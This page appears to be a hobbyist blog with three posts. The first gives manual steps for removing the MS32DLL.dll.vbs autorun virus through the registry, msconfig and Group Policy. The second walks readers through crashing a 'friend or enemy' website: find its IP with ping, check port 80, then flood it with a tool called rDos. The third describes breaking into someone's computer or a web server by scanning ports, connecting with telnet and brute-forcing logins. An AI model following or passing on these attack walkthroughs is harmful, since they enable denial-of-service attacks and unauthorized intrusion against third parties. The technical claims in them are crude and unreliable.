METHOD IIAlternative method to remove autorun.inf virus or ms32dll.dll.vbs
1-2. double click on My computer on Desktop ,
- choose Tool and select “Folder options”
- click on “View” tap select “Show Hidden files and folders” and un hake “Hide Extention….”
- and “Hide protected operating system file” (this selections are important to find the files you need to delete)
- then click “OK”
3. open Windows Task Manager (ctrl-alt-del) and select the “Processes” tap
- Click on “Image name” to sort File
- find “wscript.exe” and click on “End Process” (if there is more than one process with that name you have to end all of them)
- close the “Task Manager”
4. then you will click on Start and select “Search” and search for “autorun.inf” (Search the computer)
- you will then delete all the files that contains the text MS32DLL.dll.vbs (the virus) by pressing:SHIFT + DELETE. (There of course should not be Autorun.inf in the C rooth).
5. you will also delete the virus from the system (C:WINDOWS MS32DLL.dll.vbs) by pressing: SHIFT + DELETE
6. Next step is to edit the Register (Like always you have to be very care fool in the registry tools. Some mistake there can crash your computer)
- first, click on “Start” and select “Run” and type in “Regedit” and press “Enter”.
- select HKEY_LOCAL_MACHINE –> Software –>Microsoft –>Windows –> Current Version –> Run.
- find there “MS32DLL” and delete that entry.
6. Then select HKEY_CURRENT_USER –> Software –> Microsoft –> Internet Explorer –> Main. There you find “Window Title “Hacked by Godzilla”" and you should delete that entry. You can close the registry now.
7. next you will click on Start –> Run and type in “gpedit.msc” and press “Enter”. then you will open “Group Policy”.
- there you will select User Configuration –> Administrative Templates –> System –> and there you will double click on “Turn Off Autoplay”
- in the window there you should select “Enabled” and select “All drives” (they say in this Thai webside that select all turn of Autoplay will be safer for not getting viruses). Now you can close the Group Policy.
8. Next you will click on Start –> Run and type “msconfig” and press “Enter”.
- you will open “System Configuration Utility”.
- click on “Startup” tap
- find the file MS32DLL, choose Enable All, then unhake “MS32DLL”
- click Apply then OK to close
- then you will exit the “System Configuration Utility” and select “Exit Without Restart” when prompt.
9. After this you double click on My Computer and select “Tools” and “Folder Options” and “View” tap to change back there.
- select “Hide Extention…” and “Hide protected operating system file” and “Don’t show hidden files and folders”.
- then you will empty the “Recycle bin” and “Restart” your computer.

After applying both methods, I trusted the second method. Which one worked great on you?
Lets comment in it.

Hacking and crashing website using IP

Suhan Gorya

Your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it

TOOLS:
Port Scanner

Step One: First we need to find the websites IP Adress. This is very easy todo. Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /’s)
23u67h1 Hacking and crashing website using IP
Step Two: Now we must test to see if port 80 is open (it usually is).
This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open
2w68nys Hacking and crashing website using IP
Step Three ALMOST DONE:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!
Ok open Up rDos that you download.
Enter your victims ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn’t connect!
EXAMPLE: bhzlp0 Hacking and crashing website using IP
Thanks for reading i hope this helps icon smile Hacking and crashing website using IP

How to hack remote computer using IP Address

Suhan Gorya

cybercrime How to hack remote computer using IP Address
Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
a How to hack remote computer using IP Address
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
c How to hack remote computer using IP Address
You’ll be asked to input login information.
d How to hack remote computer using IP Address
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address